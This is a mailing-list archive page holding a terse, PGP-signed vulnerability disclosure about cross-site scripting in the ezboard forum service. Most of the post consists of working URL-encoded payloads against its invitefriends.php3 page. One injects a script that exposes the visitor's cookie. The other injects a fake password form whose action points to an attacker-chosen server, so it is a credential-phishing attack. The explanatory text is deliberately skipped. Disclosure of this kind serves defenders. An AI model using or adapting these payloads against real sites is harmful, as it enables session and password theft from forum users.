| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: idoru at videosoft.net.uy (David F. Madrid) Subject: XSS in ezboard -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Issue : Cross site scripting in ezboard Vendor status : developers were contacted ezboard offers a free forum hosted at ... bla ... bla ... improper input validation .. bla ... bla ... script or HTML execution ... bla ... bla ( sorry but I don't have time now for advisories ) Cross site scripting http://www1.ezboard.com/invitefriends.php3?action=http://pub80.ezboard.com/ano.doTel lAFriend&yourName=dav%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3 E A more elaborated attack ( but still lame ) can be constructed http://www1.ezboard.com/invitefriends.php3?action=http://[server]&yourName=%22%3E %3Cp%3E%3Cb%3EYou%20must%20enter%20your%20password%20to%20invite%20 a%20friend%3C/b%3E%3Cp%3E%3Cinput%20type=password%20name=pass%3E%3 Cp%3E%3Cb%3EEnter%20your%20friend%20address%3C/b%3E%3Cp%3E%3Cinput %20type=text%20name=mail%3E%3C/form%3E%3C!-- Regards , - -- David F. Madrid , Madrid , Spain -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQE/UirhFqGtZPZQ4dQRAp2eAJ46+Ewl93+zU6UUzepTnvoGiiiN9ACfUECb yxCKp/y3KndNuKiG5OrhIwk= =I8Q+ -----END PGP SIGNATURE-----
Powered by blists - more mailing lists